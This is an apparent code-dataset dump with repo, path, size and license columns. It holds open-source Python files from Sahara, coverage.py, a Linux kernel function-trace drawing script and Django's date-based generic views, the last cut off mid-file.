repo_name
stringlengths
5
100
path
stringlengths
4
375
copies
stringclasses
991 values
size
stringlengths
4
7
content
stringlengths
666
1M
license
stringclasses
15 values
esikachev/scenario
sahara/service/validation.py
10
2522
# Copyright (c) 2013 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import functools import jsonschema from sahara import exceptions as ex from sahara.i18n import _ from sahara.utils import api as u from sahara.utils import api_validator def validate(schema, *validators): def decorator(func): @functools.wraps(func) def handler(*args, **kwargs): request_data = u.request_data() try: if schema: validator = api_validator.ApiValidator(schema) validator.validate(request_data) if validators: for validator in validators: validator(**kwargs) except jsonschema.ValidationError as e: e.code = "VALIDATION_ERROR" return u.bad_request(e) except ex.SaharaException as e: return u.bad_request(e) except Exception as e: return u.internal_error( 500, "Error occurred during validation", e) return func(*args, **kwargs) return handler return decorator def check_exists(get_func, *id_prop, **get_args): def decorator(func): @functools.wraps(func) def handler(*args, **kwargs): if id_prop and not get_args: get_args['id'] = id_prop[0] get_kwargs = {} for get_arg in get_args: get_kwargs[get_arg] = kwargs[get_args[get_arg]] obj = None try: obj = get_func(**get_kwargs) except Exception as e: if 'notfound' not in e.__class__.__name__.lower(): raise e if obj is None: e = ex.NotFoundException(get_kwargs, _('Object with %s not found')) return u.not_found(e) return func(*args, **kwargs) return handler return decorator
apache-2.0
primiano/depot_tools
third_party/coverage/cmdline.py
49
25011
"""Command-line support for Coverage.""" import optparse, os, sys, traceback from coverage.backward import sorted # pylint: disable=W0622 from coverage.execfile import run_python_file, run_python_module from coverage.misc import CoverageException, ExceptionDuringRun, NoSource from coverage.debug import info_formatter class Opts(object): """A namespace class for individual options we'll build parsers from.""" append = optparse.make_option( '-a', '--append', action='store_false', dest="erase_first", help="Append coverage data to .coverage, otherwise it is started " "clean with each run." ) branch = optparse.make_option( '', '--branch', action='store_true', help="Measure branch coverage in addition to statement coverage." ) debug = optparse.make_option( '', '--debug', action='store', metavar="OPTS", help="Debug options, separated by commas" ) directory = optparse.make_option( '-d', '--directory', action='store', metavar="DIR", help="Write the output files to DIR." ) fail_under = optparse.make_option( '', '--fail-under', action='store', metavar="MIN", type="int", help="Exit with a status of 2 if the total coverage is less than MIN." ) help = optparse.make_option( '-h', '--help', action='store_true', help="Get help on this command." ) ignore_errors = optparse.make_option( '-i', '--ignore-errors', action='store_true', help="Ignore errors while reading source files." ) include = optparse.make_option( '', '--include', action='store', metavar="PAT1,PAT2,...", help="Include files only when their filename path matches one of " "these patterns. Usually needs quoting on the command line." ) pylib = optparse.make_option( '-L', '--pylib', action='store_true', help="Measure coverage even inside the Python installed library, " "which isn't done by default." ) show_missing = optparse.make_option( '-m', '--show-missing', action='store_true', help="Show line numbers of statements in each module that weren't " "executed." 
) old_omit = optparse.make_option( '-o', '--omit', action='store', metavar="PAT1,PAT2,...", help="Omit files when their filename matches one of these patterns. " "Usually needs quoting on the command line." ) omit = optparse.make_option( '', '--omit', action='store', metavar="PAT1,PAT2,...", help="Omit files when their filename matches one of these patterns. " "Usually needs quoting on the command line." ) output_xml = optparse.make_option( '-o', '', action='store', dest="outfile", metavar="OUTFILE", help="Write the XML report to this file. Defaults to 'coverage.xml'" ) parallel_mode = optparse.make_option( '-p', '--parallel-mode', action='store_true', help="Append the machine name, process id and random number to the " ".coverage data file name to simplify collecting data from " "many processes." ) module = optparse.make_option( '-m', '--module', action='store_true', help="<pyfile> is an importable Python module, not a script path, " "to be run as 'python -m' would run it." ) rcfile = optparse.make_option( '', '--rcfile', action='store', help="Specify configuration file. Defaults to '.coveragerc'" ) source = optparse.make_option( '', '--source', action='store', metavar="SRC1,SRC2,...", help="A list of packages or directories of code to be measured." ) timid = optparse.make_option( '', '--timid', action='store_true', help="Use a simpler but slower trace method. Try this if you get " "seemingly impossible results!" ) title = optparse.make_option( '', '--title', action='store', metavar="TITLE", help="A text string to use as the title on the HTML." ) version = optparse.make_option( '', '--version', action='store_true', help="Display version information and exit." ) class CoverageOptionParser(optparse.OptionParser, object): """Base OptionParser for coverage. Problems don't exit the program. Defaults are initialized for all options. 
""" def __init__(self, *args, **kwargs): super(CoverageOptionParser, self).__init__( add_help_option=False, *args, **kwargs ) self.set_defaults( actions=[], branch=None, debug=None, directory=None, fail_under=None, help=None, ignore_errors=None, include=None, omit=None, parallel_mode=None, module=None, pylib=None, rcfile=True, show_missing=None, source=None, timid=None, title=None, erase_first=None, version=None, ) self.disable_interspersed_args() self.help_fn = self.help_noop def help_noop(self, error=None, topic=None, parser=None): """No-op help function.""" pass class OptionParserError(Exception): """Used to stop the optparse error handler ending the process.""" pass def parse_args(self, args=None, options=None): """Call optparse.parse_args, but return a triple: (ok, options, args) """ try: options, args = \ super(CoverageOptionParser, self).parse_args(args, options) except self.OptionParserError: return False, None, None return True, options, args def error(self, msg): """Override optparse.error so sys.exit doesn't get called.""" self.help_fn(msg) raise self.OptionParserError class ClassicOptionParser(CoverageOptionParser): """Command-line parser for coverage.py classic arguments.""" def __init__(self): super(ClassicOptionParser, self).__init__() self.add_action('-a', '--annotate', 'annotate') self.add_action('-b', '--html', 'html') self.add_action('-c', '--combine', 'combine') self.add_action('-e', '--erase', 'erase') self.add_action('-r', '--report', 'report') self.add_action('-x', '--execute', 'execute') self.add_options([ Opts.directory, Opts.help, Opts.ignore_errors, Opts.pylib, Opts.show_missing, Opts.old_omit, Opts.parallel_mode, Opts.timid, Opts.version, ]) def add_action(self, dash, dashdash, action_code): """Add a specialized option that is the action to execute.""" option = self.add_option(dash, dashdash, action='callback', callback=self._append_action ) option.action_code = action_code def _append_action(self, option, opt_unused, value_unused, 
parser): """Callback for an option that adds to the `actions` list.""" parser.values.actions.append(option.action_code) class CmdOptionParser(CoverageOptionParser): """Parse one of the new-style commands for coverage.py.""" def __init__(self, action, options=None, defaults=None, usage=None, cmd=None, description=None ): """Create an OptionParser for a coverage command. `action` is the slug to put into `options.actions`. `options` is a list of Option's for the command. `defaults` is a dict of default value for options. `usage` is the usage string to display in help. `cmd` is the command name, if different than `action`. `description` is the description of the command, for the help text. """ if usage: usage = "%prog " + usage super(CmdOptionParser, self).__init__( prog="coverage %s" % (cmd or action), usage=usage, description=description, ) self.set_defaults(actions=[action], **(defaults or {})) if options: self.add_options(options) self.cmd = cmd or action def __eq__(self, other): # A convenience equality, so that I can put strings in unit test # results, and they will compare equal to objects. return (other == "<CmdOptionParser:%s>" % self.cmd) GLOBAL_ARGS = [ Opts.rcfile, Opts.help, ] CMDS = { 'annotate': CmdOptionParser("annotate", [ Opts.directory, Opts.ignore_errors, Opts.omit, Opts.include, ] + GLOBAL_ARGS, usage = "[options] [modules]", description = "Make annotated copies of the given files, marking " "statements that are executed with > and statements that are " "missed with !." ), 'combine': CmdOptionParser("combine", GLOBAL_ARGS, usage = " ", description = "Combine data from multiple coverage files collected " "with 'run -p'. The combined results are written to a single " "file representing the union of the data." ), 'debug': CmdOptionParser("debug", GLOBAL_ARGS, usage = "<topic>", description = "Display information on the internals of coverage.py, " "for diagnosing problems. 
" "Topics are 'data' to show a summary of the collected data, " "or 'sys' to show installation information." ), 'erase': CmdOptionParser("erase", GLOBAL_ARGS, usage = " ", description = "Erase previously collected coverage data." ), 'help': CmdOptionParser("help", GLOBAL_ARGS, usage = "[command]", description = "Describe how to use coverage.py" ), 'html': CmdOptionParser("html", [ Opts.directory, Opts.fail_under, Opts.ignore_errors, Opts.omit, Opts.include, Opts.title, ] + GLOBAL_ARGS, usage = "[options] [modules]", description = "Create an HTML report of the coverage of the files. " "Each file gets its own page, with the source decorated to show " "executed, excluded, and missed lines." ), 'report': CmdOptionParser("report", [ Opts.fail_under, Opts.ignore_errors, Opts.omit, Opts.include, Opts.show_missing, ] + GLOBAL_ARGS, usage = "[options] [modules]", description = "Report coverage statistics on modules." ), 'run': CmdOptionParser("execute", [ Opts.append, Opts.branch, Opts.debug, Opts.pylib, Opts.parallel_mode, Opts.module, Opts.timid, Opts.source, Opts.omit, Opts.include, ] + GLOBAL_ARGS, defaults = {'erase_first': True}, cmd = "run", usage = "[options] <pyfile> [program options]", description = "Run a Python program, measuring code execution." ), 'xml': CmdOptionParser("xml", [ Opts.fail_under, Opts.ignore_errors, Opts.omit, Opts.include, Opts.output_xml, ] + GLOBAL_ARGS, cmd = "xml", usage = "[options] [modules]", description = "Generate an XML report of coverage results." ), } OK, ERR, FAIL_UNDER = 0, 1, 2 class CoverageScript(object): """The command-line interface to Coverage.""" def __init__(self, _covpkg=None, _run_python_file=None, _run_python_module=None, _help_fn=None): # _covpkg is for dependency injection, so we can test this code. 
if _covpkg: self.covpkg = _covpkg else: import coverage self.covpkg = coverage # For dependency injection: self.run_python_file = _run_python_file or run_python_file self.run_python_module = _run_python_module or run_python_module self.help_fn = _help_fn or self.help self.classic = False self.coverage = None def command_line(self, argv): """The bulk of the command line interface to Coverage. `argv` is the argument list to process. Returns 0 if all is well, 1 if something went wrong. """ # Collect the command-line options. if not argv: self.help_fn(topic='minimum_help') return OK # The command syntax we parse depends on the first argument. Classic # syntax always starts with an option. self.classic = argv[0].startswith('-') if self.classic: parser = ClassicOptionParser() else: parser = CMDS.get(argv[0]) if not parser: self.help_fn("Unknown command: '%s'" % argv[0]) return ERR argv = argv[1:] parser.help_fn = self.help_fn ok, options, args = parser.parse_args(argv) if not ok: return ERR # Handle help and version. if self.do_help(options, args, parser): return OK # Check for conflicts and problems in the options. if not self.args_ok(options, args): return ERR # Listify the list options. source = unshell_list(options.source) omit = unshell_list(options.omit) include = unshell_list(options.include) debug = unshell_list(options.debug) # Do something. self.coverage = self.covpkg.coverage( data_suffix = options.parallel_mode, cover_pylib = options.pylib, timid = options.timid, branch = options.branch, config_file = options.rcfile, source = source, omit = omit, include = include, debug = debug, ) if 'debug' in options.actions: return self.do_debug(args) if 'erase' in options.actions or options.erase_first: self.coverage.erase() else: self.coverage.load() if 'execute' in options.actions: self.do_execute(options, args) if 'combine' in options.actions: self.coverage.combine() self.coverage.save() # Remaining actions are reporting, with some common options. 
report_args = dict( morfs = args, ignore_errors = options.ignore_errors, omit = omit, include = include, ) if 'report' in options.actions: total = self.coverage.report( show_missing=options.show_missing, **report_args) if 'annotate' in options.actions: self.coverage.annotate( directory=options.directory, **report_args) if 'html' in options.actions: total = self.coverage.html_report( directory=options.directory, title=options.title, **report_args) if 'xml' in options.actions: outfile = options.outfile total = self.coverage.xml_report(outfile=outfile, **report_args) if options.fail_under is not None: if total >= options.fail_under: return OK else: return FAIL_UNDER else: return OK def help(self, error=None, topic=None, parser=None): """Display an error message, or the named topic.""" assert error or topic or parser if error: print(error) print("Use 'coverage help' for help.") elif parser: print(parser.format_help().strip()) else: help_msg = HELP_TOPICS.get(topic, '').strip() if help_msg: print(help_msg % self.covpkg.__dict__) else: print("Don't know topic %r" % topic) def do_help(self, options, args, parser): """Deal with help requests. Return True if it handled the request, False if not. """ # Handle help. if options.help: if self.classic: self.help_fn(topic='help') else: self.help_fn(parser=parser) return True if "help" in options.actions: if args: for a in args: parser = CMDS.get(a) if parser: self.help_fn(parser=parser) else: self.help_fn(topic=a) else: self.help_fn(topic='help') return True # Handle version. if options.version: self.help_fn(topic='version') return True return False def args_ok(self, options, args): """Check for conflicts and problems in the options. Returns True if everything is ok, or False if not. """ for i in ['erase', 'execute']: for j in ['annotate', 'html', 'report', 'combine']: if (i in options.actions) and (j in options.actions): self.help_fn("You can't specify the '%s' and '%s' " "options at the same time." 
% (i, j)) return False if not options.actions: self.help_fn( "You must specify at least one of -e, -x, -c, -r, -a, or -b." ) return False args_allowed = ( 'execute' in options.actions or 'annotate' in options.actions or 'html' in options.actions or 'debug' in options.actions or 'report' in options.actions or 'xml' in options.actions ) if not args_allowed and args: self.help_fn("Unexpected arguments: %s" % " ".join(args)) return False if 'execute' in options.actions and not args: self.help_fn("Nothing to do.") return False return True def do_execute(self, options, args): """Implementation of 'coverage run'.""" # Set the first path element properly. old_path0 = sys.path[0] # Run the script. self.coverage.start() code_ran = True try: try: if options.module: sys.path[0] = '' self.run_python_module(args[0], args) else: filename = args[0] sys.path[0] = os.path.abspath(os.path.dirname(filename)) self.run_python_file(filename, args) except NoSource: code_ran = False raise finally: self.coverage.stop() if code_ran: self.coverage.save() # Restore the old path sys.path[0] = old_path0 def do_debug(self, args): """Implementation of 'coverage debug'.""" if not args: self.help_fn("What information would you like: data, sys?") return ERR for info in args: if info == 'sys': print("-- sys ----------------------------------------") for line in info_formatter(self.coverage.sysinfo()): print(" %s" % line) elif info == 'data': print("-- data ---------------------------------------") self.coverage.load() print("path: %s" % self.coverage.data.filename) print("has_arcs: %r" % self.coverage.data.has_arcs()) summary = self.coverage.data.summary(fullpath=True) if summary: filenames = sorted(summary.keys()) print("\n%d files:" % len(filenames)) for f in filenames: print("%s: %d lines" % (f, summary[f])) else: print("No data collected") else: self.help_fn("Don't know what you mean by %r" % info) return ERR return OK def unshell_list(s): """Turn a command-line argument into a list.""" if not s: 
return None if sys.platform == 'win32': # When running coverage as coverage.exe, some of the behavior # of the shell is emulated: wildcards are expanded into a list of # filenames. So you have to single-quote patterns on the command # line, but (not) helpfully, the single quotes are included in the # argument, so we have to strip them off here. s = s.strip("'") return s.split(',') HELP_TOPICS = { # ------------------------- 'classic': r"""Coverage.py version %(__version__)s Measure, collect, and report on code coverage in Python programs. Usage: coverage -x [-p] [-L] [--timid] MODULE.py [ARG1 ARG2 ...] Execute the module, passing the given command-line arguments, collecting coverage data. With the -p option, include the machine name and process id in the .coverage file name. With -L, measure coverage even inside the Python installed library, which isn't done by default. With --timid, use a simpler but slower trace method. coverage -e Erase collected coverage data. coverage -c Combine data from multiple coverage files (as created by -p option above) and store it into a single file representing the union of the coverage. coverage -r [-m] [-i] [-o DIR,...] [FILE1 FILE2 ...] Report on the statement coverage for the given files. With the -m option, show line numbers of the statements that weren't executed. coverage -b -d DIR [-i] [-o DIR,...] [FILE1 FILE2 ...] Create an HTML report of the coverage of the given files. Each file gets its own page, with the file listing decorated to show executed, excluded, and missed lines. coverage -a [-d DIR] [-i] [-o DIR,...] [FILE1 FILE2 ...] Make annotated copies of the given files, marking statements that are executed with > and statements that are missed with !. -d DIR Write output files for -b or -a to this directory. -i Ignore errors while reporting or annotating. -o DIR,... Omit reporting or annotating files when their filename path starts with a directory listed in the omit list. e.g. 
coverage -i -r -o c:\python25,lib\enthought\traits Coverage data is saved in the file .coverage by default. Set the COVERAGE_FILE environment variable to save it somewhere else. """, # ------------------------- 'help': """\ Coverage.py, version %(__version__)s Measure, collect, and report on code coverage in Python programs. usage: coverage <command> [options] [args] Commands: annotate Annotate source files with execution information. combine Combine a number of data files. erase Erase previously collected coverage data. help Get help on using coverage.py. html Create an HTML report. report Report coverage stats on modules. run Run a Python program and measure code execution. xml Create an XML report of coverage results. Use "coverage help <command>" for detailed help on any command. Use "coverage help classic" for help on older command syntax. For more information, see %(__url__)s """, # ------------------------- 'minimum_help': """\ Code coverage for Python. Use 'coverage help' for help. """, # ------------------------- 'version': """\ Coverage.py, version %(__version__)s. %(__url__)s """, } def main(argv=None): """The main entry point to Coverage. This is installed as the script entry point. """ if argv is None: argv = sys.argv[1:] try: status = CoverageScript().command_line(argv) except ExceptionDuringRun: # An exception was caught while running the product code. The # sys.exc_info() return tuple is packed into an ExceptionDuringRun # exception. _, err, _ = sys.exc_info() traceback.print_exception(*err.args) status = ERR except CoverageException: # A controlled error inside coverage.py: print the message to the user. _, err, _ = sys.exc_info() print(err) status = ERR except SystemExit: # The user called `sys.exit()`. Exit with their argument, if any. _, err, _ = sys.exc_info() if err.args: status = err.args[0] else: status = None return status
bsd-3-clause
mrg666/android_kernel_icon
scripts/tracing/draw_functrace.py
14676
3560
#!/usr/bin/python """ Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com> Licensed under the terms of the GNU GPL License version 2 This script parses a trace provided by the function tracer in kernel/trace/trace_functions.c The resulted trace is processed into a tree to produce a more human view of the call stack by drawing textual but hierarchical tree of calls. Only the functions's names and the the call time are provided. Usage: Be sure that you have CONFIG_FUNCTION_TRACER # mount -t debugfs nodev /sys/kernel/debug # echo function > /sys/kernel/debug/tracing/current_tracer $ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func Wait some times but not too much, the script is a bit slow. Break the pipe (Ctrl + Z) $ scripts/draw_functrace.py < raw_trace_func > draw_functrace Then you have your drawn trace in draw_functrace """ import sys, re class CallTree: """ This class provides a tree representation of the functions call stack. If a function has no parent in the kernel (interrupt, syscall, kernel thread...) then it is attached to a virtual parent called ROOT. """ ROOT = None def __init__(self, func, time = None, parent = None): self._func = func self._time = time if parent is None: self._parent = CallTree.ROOT else: self._parent = parent self._children = [] def calls(self, func, calltime): """ If a function calls another one, call this method to insert it into the tree at the appropriate place. @return: A reference to the newly created child node. """ child = CallTree(func, calltime, self) self._children.append(child) return child def getParent(self, func): """ Retrieve the last parent of the current node that has the name given by func. If this function is not on a parent, then create it as new child of root @return: A reference to the parent. 
""" tree = self while tree != CallTree.ROOT and tree._func != func: tree = tree._parent if tree == CallTree.ROOT: child = CallTree.ROOT.calls(func, None) return child return tree def __repr__(self): return self.__toString("", True) def __toString(self, branch, lastChild): if self._time is not None: s = "%s----%s (%s)\n" % (branch, self._func, self._time) else: s = "%s----%s\n" % (branch, self._func) i = 0 if lastChild: branch = branch[:-1] + " " while i < len(self._children): if i != len(self._children) - 1: s += "%s" % self._children[i].__toString(branch +\ " |", False) else: s += "%s" % self._children[i].__toString(branch +\ " |", True) i += 1 return s class BrokenLineException(Exception): """If the last line is not complete because of the pipe breakage, we want to stop the processing and ignore this line. """ pass class CommentLineException(Exception): """ If the line is a comment (as in the beginning of the trace file), just ignore it. """ pass def parseLine(line): line = line.strip() if line.startswith("#"): raise CommentLineException m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line) if m is None: raise BrokenLineException return (m.group(1), m.group(2), m.group(3)) def main(): CallTree.ROOT = CallTree("Root (Nowhere)", None, None) tree = CallTree.ROOT for line in sys.stdin: try: calltime, callee, caller = parseLine(line) except BrokenLineException: break except CommentLineException: continue tree = tree.getParent(caller) tree = tree.calls(callee, calltime) print CallTree.ROOT if __name__ == "__main__": main()
gpl-2.0
jhg/django
django/views/generic/dates.py
251
25791
from __future__ import unicode_literals import datetime from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.db import models from django.http import Http404 from django.utils import timezone from django.utils.encoding import force_str, force_text from django.utils.functional import cached_property from django.utils.translation import ugettext as _ from django.views.generic.base import View from django.views.generic.detail import ( BaseDetailView, SingleObjectTemplateResponseMixin, ) from django.views.generic.list import ( MultipleObjectMixin, MultipleObjectTemplateResponseMixin, ) class YearMixin(object): """ Mixin for views manipulating year-based data. """ year_format = '%Y' year = None def get_year_format(self): """ Get a year format string in strptime syntax to be used to parse the year from url variables. """ return self.year_format def get_year(self): """ Return the year for which this view should display data. """ year = self.year if year is None: try: year = self.kwargs['year'] except KeyError: try: year = self.request.GET['year'] except KeyError: raise Http404(_("No year specified")) return year def get_next_year(self, date): """ Get the next valid year. """ return _get_next_prev(self, date, is_previous=False, period='year') def get_previous_year(self, date): """ Get the previous valid year. """ return _get_next_prev(self, date, is_previous=True, period='year') def _get_next_year(self, date): """ Return the start date of the next interval. The interval is defined by start date <= item date < next start date. """ return date.replace(year=date.year + 1, month=1, day=1) def _get_current_year(self, date): """ Return the start date of the current interval. """ return date.replace(month=1, day=1) class MonthMixin(object): """ Mixin for views manipulating month-based data. 
""" month_format = '%b' month = None def get_month_format(self): """ Get a month format string in strptime syntax to be used to parse the month from url variables. """ return self.month_format def get_month(self): """ Return the month for which this view should display data. """ month = self.month if month is None: try: month = self.kwargs['month'] except KeyError: try: month = self.request.GET['month'] except KeyError: raise Http404(_("No month specified")) return month def get_next_month(self, date): """ Get the next valid month. """ return _get_next_prev(self, date, is_previous=False, period='month') def get_previous_month(self, date): """ Get the previous valid month. """ return _get_next_prev(self, date, is_previous=True, period='month') def _get_next_month(self, date): """ Return the start date of the next interval. The interval is defined by start date <= item date < next start date. """ if date.month == 12: return date.replace(year=date.year + 1, month=1, day=1) else: return date.replace(month=date.month + 1, day=1) def _get_current_month(self, date): """ Return the start date of the previous interval. """ return date.replace(day=1) class DayMixin(object): """ Mixin for views manipulating day-based data. """ day_format = '%d' day = None def get_day_format(self): """ Get a day format string in strptime syntax to be used to parse the day from url variables. """ return self.day_format def get_day(self): """ Return the day for which this view should display data. """ day = self.day if day is None: try: day = self.kwargs['day'] except KeyError: try: day = self.request.GET['day'] except KeyError: raise Http404(_("No day specified")) return day def get_next_day(self, date): """ Get the next valid day. """ return _get_next_prev(self, date, is_previous=False, period='day') def get_previous_day(self, date): """ Get the previous valid day. 
""" return _get_next_prev(self, date, is_previous=True, period='day') def _get_next_day(self, date): """ Return the start date of the next interval. The interval is defined by start date <= item date < next start date. """ return date + datetime.timedelta(days=1) def _get_current_day(self, date): """ Return the start date of the current interval. """ return date class WeekMixin(object): """ Mixin for views manipulating week-based data. """ week_format = '%U' week = None def get_week_format(self): """ Get a week format string in strptime syntax to be used to parse the week from url variables. """ return self.week_format def get_week(self): """ Return the week for which this view should display data """ week = self.week if week is None: try: week = self.kwargs['week'] except KeyError: try: week = self.request.GET['week'] except KeyError: raise Http404(_("No week specified")) return week def get_next_week(self, date): """ Get the next valid week. """ return _get_next_prev(self, date, is_previous=False, period='week') def get_previous_week(self, date): """ Get the previous valid week. """ return _get_next_prev(self, date, is_previous=True, period='week') def _get_next_week(self, date): """ Return the start date of the next interval. The interval is defined by start date <= item date < next start date. """ return date + datetime.timedelta(days=7 - self._get_weekday(date)) def _get_current_week(self, date): """ Return the start date of the current interval. """ return date - datetime.timedelta(self._get_weekday(date)) def _get_weekday(self, date): """ Return the weekday for a given date. The first day according to the week format is 0 and the last day is 6. 
""" week_format = self.get_week_format() if week_format == '%W': # week starts on Monday return date.weekday() elif week_format == '%U': # week starts on Sunday return (date.weekday() + 1) % 7 else: raise ValueError("unknown week format: %s" % week_format) class DateMixin(object): """ Mixin class for views manipulating date-based data. """ date_field = None allow_future = False def get_date_field(self): """ Get the name of the date field to be used to filter by. """ if self.date_field is None: raise ImproperlyConfigured("%s.date_field is required." % self.__class__.__name__) return self.date_field def get_allow_future(self): """ Returns `True` if the view should be allowed to display objects from the future. """ return self.allow_future # Note: the following three methods only work in subclasses that also # inherit SingleObjectMixin or MultipleObjectMixin. @cached_property def uses_datetime_field(self): """ Return `True` if the date field is a `DateTimeField` and `False` if it's a `DateField`. """ model = self.get_queryset().model if self.model is None else self.model field = model._meta.get_field(self.get_date_field()) return isinstance(field, models.DateTimeField) def _make_date_lookup_arg(self, value): """ Convert a date into a datetime when the date field is a DateTimeField. When time zone support is enabled, `date` is assumed to be in the current time zone, so that displayed items are consistent with the URL. """ if self.uses_datetime_field: value = datetime.datetime.combine(value, datetime.time.min) if settings.USE_TZ: value = timezone.make_aware(value, timezone.get_current_timezone()) return value def _make_single_date_lookup(self, date): """ Get the lookup kwargs for filtering on a single date. If the date field is a DateTimeField, we can't just filter on date_field=date because that doesn't take the time into account. 
""" date_field = self.get_date_field() if self.uses_datetime_field: since = self._make_date_lookup_arg(date) until = self._make_date_lookup_arg(date + datetime.timedelta(days=1)) return { '%s__gte' % date_field: since, '%s__lt' % date_field: until, } else: # Skip self._make_date_lookup_arg, it's a no-op in this branch. return {date_field: date} class BaseDateListView(MultipleObjectMixin, DateMixin, View): """ Abstract base class for date-based views displaying a list of objects. """ allow_empty = False date_list_period = 'year' def get(self, request, *args, **kwargs): self.date_list, self.object_list, extra_context = self.get_dated_items() context = self.get_context_data(object_list=self.object_list, date_list=self.date_list) context.update(extra_context) return self.render_to_response(context) def get_dated_items(self): """ Obtain the list of dates and items. """ raise NotImplementedError('A DateView must provide an implementation of get_dated_items()') def get_ordering(self): """ Returns the field or fields to use for ordering the queryset; uses the date field by default. """ return '-%s' % self.get_date_field() if self.ordering is None else self.ordering def get_dated_queryset(self, **lookup): """ Get a queryset properly filtered according to `allow_future` and any extra lookup kwargs. """ qs = self.get_queryset().filter(**lookup) date_field = self.get_date_field() allow_future = self.get_allow_future() allow_empty = self.get_allow_empty() paginate_by = self.get_paginate_by(qs) if not allow_future: now = timezone.now() if self.uses_datetime_field else timezone_today() qs = qs.filter(**{'%s__lte' % date_field: now}) if not allow_empty: # When pagination is enabled, it's better to do a cheap query # than to load the unpaginated queryset in memory. 
is_empty = len(qs) == 0 if paginate_by is None else not qs.exists() if is_empty: raise Http404(_("No %(verbose_name_plural)s available") % { 'verbose_name_plural': force_text(qs.model._meta.verbose_name_plural) }) return qs def get_date_list_period(self): """ Get the aggregation period for the list of dates: 'year', 'month', or 'day'. """ return self.date_list_period def get_date_list(self, queryset, date_type=None, ordering='ASC'): """ Get a date list by calling `queryset.dates/datetimes()`, checking along the way for empty lists that aren't allowed. """ date_field = self.get_date_field() allow_empty = self.get_allow_empty() if date_type is None: date_type = self.get_date_list_period() if self.uses_datetime_field: date_list = queryset.datetimes(date_field, date_type, ordering) else: date_list = queryset.dates(date_field, date_type, ordering) if date_list is not None and not date_list and not allow_empty: name = force_text(queryset.model._meta.verbose_name_plural) raise Http404(_("No %(verbose_name_plural)s available") % {'verbose_name_plural': name}) return date_list class BaseArchiveIndexView(BaseDateListView): """ Base class for archives of date-based items. Requires a response mixin. """ context_object_name = 'latest' def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ qs = self.get_dated_queryset() date_list = self.get_date_list(qs, ordering='DESC') if not date_list: qs = qs.none() return (date_list, qs, {}) class ArchiveIndexView(MultipleObjectTemplateResponseMixin, BaseArchiveIndexView): """ Top-level archive of date-based items. """ template_name_suffix = '_archive' class BaseYearArchiveView(YearMixin, BaseDateListView): """ List of objects published in a given year. """ date_list_period = 'month' make_object_list = False def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. 
""" year = self.get_year() date_field = self.get_date_field() date = _date_from_string(year, self.get_year_format()) since = self._make_date_lookup_arg(date) until = self._make_date_lookup_arg(self._get_next_year(date)) lookup_kwargs = { '%s__gte' % date_field: since, '%s__lt' % date_field: until, } qs = self.get_dated_queryset(**lookup_kwargs) date_list = self.get_date_list(qs) if not self.get_make_object_list(): # We need this to be a queryset since parent classes introspect it # to find information about the model. qs = qs.none() return (date_list, qs, { 'year': date, 'next_year': self.get_next_year(date), 'previous_year': self.get_previous_year(date), }) def get_make_object_list(self): """ Return `True` if this view should contain the full list of objects in the given year. """ return self.make_object_list class YearArchiveView(MultipleObjectTemplateResponseMixin, BaseYearArchiveView): """ List of objects published in a given year. """ template_name_suffix = '_archive_year' class BaseMonthArchiveView(YearMixin, MonthMixin, BaseDateListView): """ List of objects published in a given month. """ date_list_period = 'day' def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ year = self.get_year() month = self.get_month() date_field = self.get_date_field() date = _date_from_string(year, self.get_year_format(), month, self.get_month_format()) since = self._make_date_lookup_arg(date) until = self._make_date_lookup_arg(self._get_next_month(date)) lookup_kwargs = { '%s__gte' % date_field: since, '%s__lt' % date_field: until, } qs = self.get_dated_queryset(**lookup_kwargs) date_list = self.get_date_list(qs) return (date_list, qs, { 'month': date, 'next_month': self.get_next_month(date), 'previous_month': self.get_previous_month(date), }) class MonthArchiveView(MultipleObjectTemplateResponseMixin, BaseMonthArchiveView): """ List of objects published in a given month. 
""" template_name_suffix = '_archive_month' class BaseWeekArchiveView(YearMixin, WeekMixin, BaseDateListView): """ List of objects published in a given week. """ def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ year = self.get_year() week = self.get_week() date_field = self.get_date_field() week_format = self.get_week_format() week_start = { '%W': '1', '%U': '0', }[week_format] date = _date_from_string(year, self.get_year_format(), week_start, '%w', week, week_format) since = self._make_date_lookup_arg(date) until = self._make_date_lookup_arg(self._get_next_week(date)) lookup_kwargs = { '%s__gte' % date_field: since, '%s__lt' % date_field: until, } qs = self.get_dated_queryset(**lookup_kwargs) return (None, qs, { 'week': date, 'next_week': self.get_next_week(date), 'previous_week': self.get_previous_week(date), }) class WeekArchiveView(MultipleObjectTemplateResponseMixin, BaseWeekArchiveView): """ List of objects published in a given week. """ template_name_suffix = '_archive_week' class BaseDayArchiveView(YearMixin, MonthMixin, DayMixin, BaseDateListView): """ List of objects published on a given day. """ def get_dated_items(self): """ Return (date_list, items, extra_context) for this request. """ year = self.get_year() month = self.get_month() day = self.get_day() date = _date_from_string(year, self.get_year_format(), month, self.get_month_format(), day, self.get_day_format()) return self._get_dated_items(date) def _get_dated_items(self, date): """ Do the actual heavy lifting of getting the dated items; this accepts a date object so that TodayArchiveView can be trivial. 
